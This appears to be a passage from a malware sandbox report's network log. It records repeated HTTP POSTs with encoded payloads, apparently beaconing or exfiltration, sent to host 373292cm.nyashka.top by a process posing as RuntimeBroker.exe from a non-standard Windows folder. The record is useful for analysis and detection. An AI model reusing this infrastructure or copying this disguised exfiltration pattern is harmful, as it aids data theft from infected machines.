                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:43:47.741918087 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:47.874331951 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:47 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  35 | 192.168.2.6 | 57069 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 11, 2025 06:43:48.068737030 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:43:48.681979895 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:48.846643925 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:48 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  36 | 192.168.2.6 | 57070 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 11, 2025 06:43:48.985371113 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2536
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:43:49.617538929 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:49.747021914 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:49 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  37 | 192.168.2.6 | 57071 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 11, 2025 06:43:49.889760017 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  38 | 192.168.2.6 | 57072 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 11, 2025 06:43:50.084434986 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 1852
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:43:50.712759972 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:50.842292070 CET | 308 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:50 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 152
                                                                                  Connection: keep-alive


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  39 | 192.168.2.6 | 57073 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 11, 2025 06:43:50.215289116 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:43:50.853636980 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:50.984355927 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:50 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  40 | 192.168.2.6 | 57074 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 11, 2025 06:43:51.219702959 CET | 257 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Jan 11, 2025 06:43:51.855947971 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:51.988027096 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:51 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  41 | 192.168.2.6 | 57075 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 11, 2025 06:43:52.121082067 CET | 257 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Jan 11, 2025 06:43:52.753743887 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:52.882991076 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:52 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  42 | 192.168.2.6 | 57076 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 11, 2025 06:43:53.010160923 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:43:53.639132977 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:53.766424894 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:53 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  43 | 192.168.2.6 | 57077 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 11, 2025 06:43:53.930180073 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:43:54.285871983 CET | 2544 | OUT
                                                                                  Jan 11, 2025 06:43:54.585397959 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:54.719871044 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:54 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  44 | 192.168.2.6 | 57078 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 11, 2025 06:43:54.854634047 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:43:55.207762957 CET | 2544 | OUT
                                                                                  Jan 11, 2025 06:43:55.493876934 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:55.660264969 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:55 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  45 | 192.168.2.6 | 57079 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 11, 2025 06:43:55.787805080 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:43:56.146410942 CET | 2544 | OUT
                                                                                  Jan 11, 2025 06:43:56.415776968 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:56.546447992 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:56 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  46 | 192.168.2.6 | 57080 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 11, 2025 06:43:55.854919910 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 1872
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:43:56.208977938 CET | 1872 | OUT
                                                                                  Jan 11, 2025 06:43:56.491699934 CET | 25 | IN | HTTP/1.1 100 Continue


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  47 | 192.168.2.6 | 57081 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 11, 2025 06:43:56.807445049 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:43:57.160871983 CET | 2544 | OUT
                                                                                  Jan 11, 2025 06:43:57.453675032 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:57.623456001 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:57 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  48 | 192.168.2.6 | 57083 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 11, 2025 06:43:57.758203030 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:43:58.114073992 CET | 2544 | OUT
                                                                                  Jan 11, 2025 06:43:58.409961939 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:58.575423002 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:58 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  49 | 192.168.2.6 | 57084 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 11, 2025 06:43:58.695322037 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2536
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:43:59.051956892 CET | 2536 | OUT
                                                                                  Jan 11, 2025 06:43:59.444792986 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:59.597199917 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:59 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  50 | 192.168.2.6 | 57085 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 11, 2025 06:43:59.726896048 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2536
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:00.082865000 CET | 2536 | OUT
                                                                                  Jan 11, 2025 06:44:00.356128931 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:00.486640930 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:00 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  51 | 192.168.2.6 | 57086 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 11, 2025 06:44:00.618572950 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:00.973392010 CET | 2544 | OUT
                                                                                  Jan 11, 2025 06:44:01.247380018 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:01.374439001 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:01 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  52 | 192.168.2.6 | 57087 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 11, 2025 06:44:01.514717102 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  53 | 192.168.2.6 | 57088 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 11, 2025 06:44:01.640928030 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 1852
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:02.032799959 CET | 1852 | OUT
                                                                                  Jan 11, 2025 06:44:02.297188997 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:02.431929111 CET | 308 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:02 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 152
                                                                                  Connection: keep-alive


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  54 | 192.168.2.6 | 57089 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 11, 2025 06:44:01.947981119 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:02.301491976 CET2544OUTData Raw: 5f 5d 5c 54 54 47 54 5b 5b 5f 5a 51 59 55 58 56 57 5e 5d 5a 57 5c 53 5f 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _]\TTGT[[_ZQYUXVW^]ZW\S_\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S-/'B#><\46+.+>.=+,47Q W0W()?]#;>&F$.Y/-
                                                                                  Jan 11, 2025 06:44:02.585850000 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:02.720432043 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:02 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
55 | 192.168.2.6 | 57090 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 06:44:02.852229118 CET | 257 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 373292cm.nyashka.top
Content-Length: 2544
Expect: 100-continue
Jan 11, 2025 06:44:03.207761049 CET | 2544 | OUT | Data Raw: [encoded payload omitted]
Jan 11, 2025 06:44:03.485198975 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 11, 2025 06:44:03.615292072 CET | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sat, 11 Jan 2025 05:44:03 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3b 55 5f 5b
Data Ascii: ;U_[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
56 | 192.168.2.6 | 57091 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 06:44:03.744276047 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 373292cm.nyashka.top
Content-Length: 2544
Expect: 100-continue
Connection: Keep-Alive
Jan 11, 2025 06:44:04.098382950 CET | 2544 | OUT | Data Raw: [encoded payload omitted]
Jan 11, 2025 06:44:04.373613119 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 11, 2025 06:44:04.502549887 CET | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sat, 11 Jan 2025 05:44:04 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3b 55 5f 5b
Data Ascii: ;U_[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
57 | 192.168.2.6 | 57092 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 06:44:04.747457027 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 373292cm.nyashka.top
Content-Length: 2544
Expect: 100-continue
Connection: Keep-Alive
Jan 11, 2025 06:44:05.098413944 CET | 2544 | OUT | Data Raw: [encoded payload omitted]
Jan 11, 2025 06:44:05.388629913 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 11, 2025 06:44:05.560369968 CET | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sat, 11 Jan 2025 05:44:05 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3b 55 5f 5b
Data Ascii: ;U_[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
58 | 192.168.2.6 | 57093 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 06:44:05.699287891 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 373292cm.nyashka.top
Content-Length: 2544
Expect: 100-continue
Connection: Keep-Alive
Jan 11, 2025 06:44:06.054738998 CET | 2544 | OUT | Data Raw: [encoded payload omitted]
Jan 11, 2025 06:44:06.348607063 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 11, 2025 06:44:06.482558966 CET | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sat, 11 Jan 2025 05:44:06 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3b 55 5f 5b
Data Ascii: ;U_[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
59 | 192.168.2.6 | 57094 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 06:44:06.620104074 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
